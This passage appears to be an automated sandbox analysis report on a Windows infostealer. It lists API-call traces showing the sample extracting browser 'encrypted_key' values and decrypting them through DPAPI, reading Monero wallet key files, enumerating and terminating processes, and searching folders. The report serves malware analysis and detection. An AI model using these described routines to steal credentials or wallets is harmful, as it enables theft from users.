                        • Source File: 00000000.00000002.1699280590.00000000005E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                        • Associated: 00000000.00000002.1699262744.00000000005E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.0000000000691000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.00000000006C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.00000000009C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699645348.0000000000AE2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699752146.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699765423.0000000000C84000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5e0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                        • String ID: ^userContextId=4294967295$moz-extension+++
                        • API String ID: 998311485-3310892237
                        • Opcode ID: b4422eb78b556ba3798d121e6d376d246bc5d406a4bc77c8455a5626b5693358
                        • Instruction ID: 4ccbc068b2d2f3124958b6c52cfca592ed84097e0d0bcc452045c6a6e7bee2b7
                        • Opcode Fuzzy Hash: b4422eb78b556ba3798d121e6d376d246bc5d406a4bc77c8455a5626b5693358
                        • Instruction Fuzzy Hash: 145104B191010E9BDB08FBA0DC5ADFD7B39BF94340F408528F51A67195EE786609CBA3
                        Function 005F3560 Relevance: 6.1, APIs: 4, Instructions: 124COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1699280590.00000000005E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                        • Associated: 00000000.00000002.1699262744.00000000005E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.0000000000691000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.00000000006C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.00000000009C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699645348.0000000000AE2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699752146.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699765423.0000000000C84000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5e0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrlen
                        • String ID:
                        • API String ID: 367037083-0
                        • Opcode ID: 9c6a6a8b1d6ee318f5dbf16fe70303c1d14e09b7fb079d4bc1a7b793b3e3b12f
                        • Instruction ID: d7d667ac570d2998a66fb4923f0dbe2574bf80af9033cd42f519c2d0a1c0ffd7
                        • Opcode Fuzzy Hash: 9c6a6a8b1d6ee318f5dbf16fe70303c1d14e09b7fb079d4bc1a7b793b3e3b12f
                        • Instruction Fuzzy Hash: 794121B1D1010EEBDB04EFA4D845AFEBB75BF54304F008418E616B7290DB796A05CFA2
                        Function 005E9CE0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 98COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 005FA740: lstrcpy.KERNEL32(00600E17,00000000), ref: 005FA788
                          • Part of subcall function 005E99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 005E99EC
                          • Part of subcall function 005E99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 005E9A11
                          • Part of subcall function 005E99C0: LocalAlloc.KERNEL32(00000040,?), ref: 005E9A31
                          • Part of subcall function 005E99C0: ReadFile.KERNEL32(000000FF,?,00000000,005E148F,00000000), ref: 005E9A5A
                          • Part of subcall function 005E99C0: LocalFree.KERNEL32(005E148F), ref: 005E9A90
                          • Part of subcall function 005E99C0: CloseHandle.KERNEL32(000000FF), ref: 005E9A9A
                          • Part of subcall function 005F8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 005F8E52
                        • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 005E9D39
                          • Part of subcall function 005E9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N^,00000000,00000000), ref: 005E9AEF
                          • Part of subcall function 005E9AC0: LocalAlloc.KERNEL32(00000040,?,?,?,005E4EEE,00000000,?), ref: 005E9B01
                          • Part of subcall function 005E9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N^,00000000,00000000), ref: 005E9B2A
                          • Part of subcall function 005E9AC0: LocalFree.KERNEL32(?,?,?,?,005E4EEE,00000000,?), ref: 005E9B3F
                          • Part of subcall function 005E9B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 005E9B84
                          • Part of subcall function 005E9B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 005E9BA3
                          • Part of subcall function 005E9B60: LocalFree.KERNEL32(?), ref: 005E9BD3
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1699280590.00000000005E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                        • Associated: 00000000.00000002.1699262744.00000000005E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.0000000000691000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.00000000006C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.00000000009C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699645348.0000000000AE2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699752146.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699765423.0000000000C84000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5e0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                        • String ID: $"encrypted_key":"$DPAPI
                        • API String ID: 2100535398-738592651
                        • Opcode ID: cbc85295f34a3f27939025f63cf48cef9ea46d01ecac2f31ac996e87e04ea8e8
                        • Instruction ID: a2d26176021e198862eff3a37ea7e94e8a6f88135dd2d211d4127a4e14613185
                        • Opcode Fuzzy Hash: cbc85295f34a3f27939025f63cf48cef9ea46d01ecac2f31ac996e87e04ea8e8
                        • Instruction Fuzzy Hash: C33141B5D1021DABCF08DFE5DD85AEFBBB8BF48304F144519EA45A7241E7349A04CBA1
                        Function 005F94D0 Relevance: 6.1, APIs: 4, Instructions: 89COMMON
                        Download Yara Rule
                        APIs
                        • memset.MSVCRT ref: 005F94EB
                          • Part of subcall function 005F8D50: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,005F951E,00000000), ref: 005F8D5B
                          • Part of subcall function 005F8D50: RtlAllocateHeap.NTDLL(00000000), ref: 005F8D62
                          • Part of subcall function 005F8D50: wsprintfW.USER32 ref: 005F8D78
                        • OpenProcess.KERNEL32(00001001,00000000,?), ref: 005F95AB
                        • TerminateProcess.KERNEL32(00000000,00000000), ref: 005F95C9
                        • CloseHandle.KERNEL32(00000000), ref: 005F95D6
                        Memory Dump Source
                        • Source File: 00000000.00000002.1699280590.00000000005E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                        • Associated: 00000000.00000002.1699262744.00000000005E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.0000000000691000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.00000000006C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.00000000009C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699645348.0000000000AE2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699752146.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699765423.0000000000C84000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5e0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Process$Heap$AllocateCloseHandleOpenTerminatememsetwsprintf
                        • String ID:
                        • API String ID: 3729781310-0
                        • Opcode ID: 995a66d079606905c1e33fb82bf026ebe324d1c96ccced17857fdeab80635355
                        • Instruction ID: a57bebb3c5cfba731853c2a7ba218f353f5000685f5582daeb978995b4ededc9
                        • Opcode Fuzzy Hash: 995a66d079606905c1e33fb82bf026ebe324d1c96ccced17857fdeab80635355
                        • Instruction Fuzzy Hash: DC310E7190021C9FDB15DBD0CD49BEDB778FF44700F108459E606AB184DB789A49CB52
                        Function 005F8680 Relevance: 6.1, APIs: 4, Instructions: 77processCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 005FA740: lstrcpy.KERNEL32(00600E17,00000000), ref: 005FA788
                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,006005B7), ref: 005F86CA
                        • Process32First.KERNEL32(?,00000128), ref: 005F86DE
                        • Process32Next.KERNEL32(?,00000128), ref: 005F86F3
                          • Part of subcall function 005FA9B0: lstrlen.KERNEL32(?,011591F8,?,\Monero\wallet.keys,00600E17), ref: 005FA9C5
                          • Part of subcall function 005FA9B0: lstrcpy.KERNEL32(00000000), ref: 005FAA04
                          • Part of subcall function 005FA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 005FAA12
                          • Part of subcall function 005FA8A0: lstrcpy.KERNEL32(?,00600E17), ref: 005FA905
                        • CloseHandle.KERNEL32(?), ref: 005F8761
                        Memory Dump Source
                        • Source File: 00000000.00000002.1699280590.00000000005E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                        • Associated: 00000000.00000002.1699262744.00000000005E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.0000000000691000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.00000000006C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.00000000009C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699645348.0000000000AE2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699752146.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699765423.0000000000C84000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5e0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                        • String ID:
                        • API String ID: 1066202413-0
                        • Opcode ID: 1794622278f6d7be4e8183518d3dcd9ed1ba6714d99ccc4ca428476f0879211e
                        • Instruction ID: d167e88d33cd35d7e4b52f1985ca53ffdd0617b01ac5bd8c60606f68c0cc70bb
                        • Opcode Fuzzy Hash: 1794622278f6d7be4e8183518d3dcd9ed1ba6714d99ccc4ca428476f0879211e
                        • Instruction Fuzzy Hash: 9B313EB190111DABCB24EB54CC45FFEBB78FF45740F1081A9A60DA61A0DB786A45CFA2
                        Function 005F7980 Relevance: 6.1, APIs: 4, Instructions: 51memorytimeCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00600E00,00000000,?), ref: 005F79B0
                        • RtlAllocateHeap.NTDLL(00000000), ref: 005F79B7
                        • GetLocalTime.KERNEL32(?,?,?,?,?,00600E00,00000000,?), ref: 005F79C4
                        • wsprintfA.USER32 ref: 005F79F3
                        Memory Dump Source
                        • Source File: 00000000.00000002.1699280590.00000000005E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                        • Associated: 00000000.00000002.1699262744.00000000005E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.0000000000691000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.00000000006C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.00000000009C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699645348.0000000000AE2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699752146.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699765423.0000000000C84000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5e0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateLocalProcessTimewsprintf
                        • String ID:
                        • API String ID: 377395780-0
                        • Opcode ID: 7090cc475d7357a68a90b8765bb1d77aad049cc594e0e373170593a730365033
                        • Instruction ID: 702d45aed1968ce3e6f06bd46894071ba1ac3cb4fd58fdaeb040da828eeeb09c
                        • Opcode Fuzzy Hash: 7090cc475d7357a68a90b8765bb1d77aad049cc594e0e373170593a730365033
                        • Instruction Fuzzy Hash: 85112AB2904118ABCB18DFC9DD45BBEBBF8FB4CB11F10411AF605A2280E3795941CBB1
                        Function 005FC742 Relevance: 6.0, APIs: 4, Instructions: 34COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • __getptd.LIBCMT ref: 005FC74E
                          • Part of subcall function 005FBF9F: __amsg_exit.LIBCMT ref: 005FBFAF
                        • __getptd.LIBCMT ref: 005FC765
                        • __amsg_exit.LIBCMT ref: 005FC773
                        • __updatetlocinfoEx_nolock.LIBCMT ref: 005FC797
                        Memory Dump Source
                        • Source File: 00000000.00000002.1699280590.00000000005E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                        • Associated: 00000000.00000002.1699262744.00000000005E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.0000000000691000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.00000000006C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.00000000009C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699645348.0000000000AE2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699752146.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699765423.0000000000C84000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5e0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                        • String ID:
                        • API String ID: 300741435-0
                        • Opcode ID: 096653cc66bb37e0afe2079eac18fde047b133c8d4dac49a22870a70fb7a84c8
                        • Instruction ID: 310663e9187cc6f71e18c8f743aedc195ca38a2bef5bd179b13f2335248bf68d
                        • Opcode Fuzzy Hash: 096653cc66bb37e0afe2079eac18fde047b133c8d4dac49a22870a70fb7a84c8
                        • Instruction Fuzzy Hash: 95F06D3294520EDBE721BBB8990AB7A3FA1BF80720F244159F604AA1D2DB6C5940DE56
                        Function 005F4F40 Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 005F8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 005F8E0B
                        • lstrcat.KERNEL32(?,00000000), ref: 005F4F7A
                        • lstrcat.KERNEL32(?,00601070), ref: 005F4F97
                        • lstrcat.KERNEL32(?,01159258), ref: 005F4FAB
                        • lstrcat.KERNEL32(?,00601074), ref: 005F4FBD
                          • Part of subcall function 005F4910: wsprintfA.USER32 ref: 005F492C
                          • Part of subcall function 005F4910: FindFirstFileA.KERNEL32(?,?), ref: 005F4943
                          • Part of subcall function 005F4910: StrCmpCA.SHLWAPI(?,00600FDC), ref: 005F4971
                          • Part of subcall function 005F4910: StrCmpCA.SHLWAPI(?,00600FE0), ref: 005F4987
                          • Part of subcall function 005F4910: FindNextFileA.KERNEL32(000000FF,?), ref: 005F4B7D
                          • Part of subcall function 005F4910: FindClose.KERNEL32(000000FF), ref: 005F4B92
                        Memory Dump Source
                        • Source File: 00000000.00000002.1699280590.00000000005E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                        • Associated: 00000000.00000002.1699262744.00000000005E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.0000000000691000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.00000000006C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.00000000009C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699645348.0000000000AE2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699752146.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699765423.0000000000C84000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5e0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                        • String ID:
                        • API String ID: 2667927680-0
                        • Opcode ID: 30916934787cc8cf6972c2bc6e942eab644932c24eebeb1d702faa847a87a467
                        • Instruction ID: 72f3c39dfffaa18bca419e5431fac1be84b12a6ed92b53fc30cf83cb5fb855df
                        • Opcode Fuzzy Hash: 30916934787cc8cf6972c2bc6e942eab644932c24eebeb1d702faa847a87a467
                        • Instruction Fuzzy Hash: 8F219B7690020967C768F7B0DD4AEFE373DBF94300F008555B69A961C1EEB496C98F92